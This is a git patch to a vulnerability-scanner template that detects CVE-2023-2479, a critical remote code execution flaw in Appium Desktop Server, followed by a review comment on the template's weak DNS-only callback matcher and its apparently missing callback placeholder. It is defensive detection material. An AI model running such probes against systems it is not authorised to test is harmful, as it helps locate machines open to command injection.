From ae67cf87ba6fac76bc89a70d92e4a2b0108d04da Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 26 Sep 2023 12:33:31 +0530
Subject: [PATCH] minor update
---
http/cves/2023/CVE-2023-2479.yaml | 46 ++++++++++++++-----------------
1 file changed, 20 insertions(+), 26 deletions(-)
diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
index 54d902d607..4400dbfcef 100644
--- a/http/cves/2023/CVE-2023-2479.yaml
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -1,53 +1,47 @@ id: CVE-2023-2479 info: - name: Zero Click Remote Code Execution on Appium Desktop Server - author: zn9988, Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com) - severity: Critical - description: Appium Desktop Server is susceptible to an unauthenticated remote code execution vulnerability. + name: Appium Desktop Server - Remote Code Execution + author: zn9988 + severity: critical + description: | + OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4. + remediation: Fixed in v1.22.3-4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2479 + cwe-id: CWE-78 + epss-score: 0.0008 + epss-percentile: 0.3333 + cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ - tags: http,rce,dast,oast,cve,electron + tags: cve,cve2023,appium,oast,rce -requests: +http: - method: GET path: - '{{BaseURL}}/?url=' matchers-condition: and matchers: - # Response String + - type: word + part: interactsh_protocol + words: + - "dns" + - type: word part: body words: - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource" - # Status Code - - type: status - status: - - 404 - - # Content Type - type: word part: header words: - "application/json" - # Response Header - - type: word - part: header - words: - - "X-Powered-By: Express" - - # Captured the interact callbacks - - type: word - part: interactsh_protocol - condition: or - words: - - "dns" - - "http" + - type: status + status: + - 404
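Review bot: The added `interactsh_protocol` matcher accepts only `"dns"`, so a bare name lookup is enough to satisfy the out-of-band condition of a template rated `critical`; resolvers, proxies or URL-inspecting middleboxes in front of the target can produce that lookup without the probe reaching the vulnerable component. The remaining `and` conditions (404 status, `application/json`, the not-found body text) only fingerprint the server, and this change also drops the `X-Powered-By: Express` check that narrowed the fingerprint further, so they do not compensate. If the probe is expected to cause an HTTP fetch, matching `- "http"` is stronger evidence; otherwise add a comment above the matcher such as `# DNS-only callback accepted because <reason>`. Separately, the `path` context line as shown carries no `{{interactsh-url}}` placeholder; if that is how the file actually reads, the `and` condition can never be met and the template silently reports nothing, so confirm the placeholder is present.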